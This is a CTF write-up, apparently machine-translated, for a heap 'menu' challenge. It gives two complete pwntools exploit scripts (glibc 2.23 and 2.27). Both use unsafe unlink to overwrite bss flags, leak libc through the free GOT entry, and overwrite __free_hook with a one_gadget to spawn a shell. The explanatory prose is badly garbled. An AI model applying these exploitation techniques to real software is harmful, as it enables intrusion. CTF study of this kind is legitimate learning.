The subject I do not know the specific source is a sister school to ask me this question, but really a lot of fun
Originally I thought this question a lot but found a lot of things are particularly restrictions coupled with the recent lot of things I worry about are (a bunch of four exams to review what the English are not yet ready) and then put the question thrown gou ri in charge but not the problem is not that complicated really did not think I'd like to unlink and unlink I'm really not familiar with ~
The subject is then the runtime version 2.23 but I do not have this environment plus we have not learned the high version precautions so I used 2.23 libraries to solve the problem this problem is a classic menu title
Then there are a few relatively fresh
It should be converted into a variable this can not be used or else the function show
Here are intended to limit only edit 2 times but if we modify into three or more then you can use unlimited
These two variables also facilitate the next few
Then look at the code to direct
import sys
from pwn import *
context.log_level='debug'
#context.arch='amd64'
if len(sys.argv)==1 :
io=process('./pwn',env={'LD_PRELOAD':'/lib/x86_64-linux-gnu/libc-2.23.so'})
elf=ELF('./pwn')
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
else :
io=remote('',)
elf=ELF('./pwn')
libc=ELF('')
def add(a,b):
io.sendlineafter('4.show\n','1')
io.sendlineafter('index:\n',str(a))
io.sendafter('content:\n',b)
def delete(a):
io.sendlineafter('4.show\n','2')
io.sendlineafter('index:\n',str(a))
def edit(a,b):
io.sendlineafter('4.show\n','3')
io.sendlineafter('index:\n',str(a))
io.sendafter('content:\n',b)
def show(a):
io.sendlineafter('4.show\n','4')
io.sendlineafter('index:\n',str(a))
chunk_0_addr=0x404080
bss_flag=0x404188
fd=chunk_0_addr-0x18
bk=chunk_0_addr-0x10
add(0,'aaaa')
add(1,'aaaa')
add(2,'aaaa')
add(3,'aaaa')
add(4,'aaaa')
add(5,'aaaa')
add(6,'aaaa')
delete(0)
add(0,p64(0)+p64(0x20)+p64(fd)+p64(bk)+p64(0x20)+p8(0x90))
delete(1)
edit(0,'\x00'*0x18+p64(fd)+p64(bss_flag))
edit(1,p32(1)+p32(3))# bss_show_flag bss_edit_flag
#gdb.attach(io)
edit(0,'\x00'*0x18+p64(fd)+p64(elf.got['free']))
show(1)
free_addr=u64(io.recv(6).ljust(8,'\x00'))
libc_base=free_addr-libc.sym['free']
success('libc_base'+hex(libc_base))
free_hook_addr=libc_base+libc.sym['__free_hook']
#system_addr=libc_base+libc.sym['system']
edit(0,'\x00'*0x18+p64(fd)+p64(free_hook_addr))
edit(1,p64(libc_base+0x4526a))
delete(4)
#gdb.attach(io)
#pause()
io.interactive()
2.27 also get (this protection Tcache)
import sys
from pwn import *
context.log_level='debug'
#context.arch='amd64'
if len(sys.argv)==1 :
io=process('./pwn',env={'LD_PRELOAD':'/lib/x86_64-linux-gnu/libc.so.6'})
elf=ELF('./pwn')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
else :
io=remote('',)
elf=ELF('./pwn')
libc=ELF('')
def add(a,b):
io.sendlineafter('4.show\n','1')
io.sendlineafter('index:\n',str(a))
io.sendafter('content:\n',b)
def delete(a):
io.sendlineafter('4.show\n','2')
io.sendlineafter('index:\n',str(a))
def edit(a,b):
io.sendlineafter('4.show\n','3')
io.sendlineafter('index:\n',str(a))
io.sendafter('content:\n',b)
def show(a):
io.sendlineafter('4.show\n','4')
io.sendlineafter('index:\n',str(a))
chunk_0_addr=0x404080
chunk_28_addr=0x404080+8*28
bss_flag=0x404080+0x108
fd=chunk_28_addr-0x18
bk=chunk_28_addr-0x10
for i in range(18):
add(i,'aaaa')
for i in range(17-7,17)[::-1]:
delete(i)
add(i, '\x00' * 0x28 + '\x91')
delete(i + 1)
for i in range(28, 32):
add(i, '\n')
delete(28)
add(28,p64(0)+p64(0x20)+p64(fd)+p64(bk)+p64(0x20)+p8(0x90))
delete(29)
edit(28,'\x00'*0x18+p64(fd)+p64(bss_flag))
edit(29,p32(1)+p32(3))
edit(28,'\x00'*0x18+p64(fd)+p64(elf.got['free']))
show(29)
free_addr=u64(io.recv(6).ljust(8,'\x00'))
libc_base=free_addr-libc.sym['free']
success('libc_base'+hex(libc_base))
free_hook_addr=libc_base+libc.sym['__free_hook']
edit(28,'\x00'*0x18+p64(fd)+p64(free_hook_addr))
edit(29,p64(libc_base+0xe42ee))
delete(4)
#gdb.attach(io)
#pause()
io.interactive()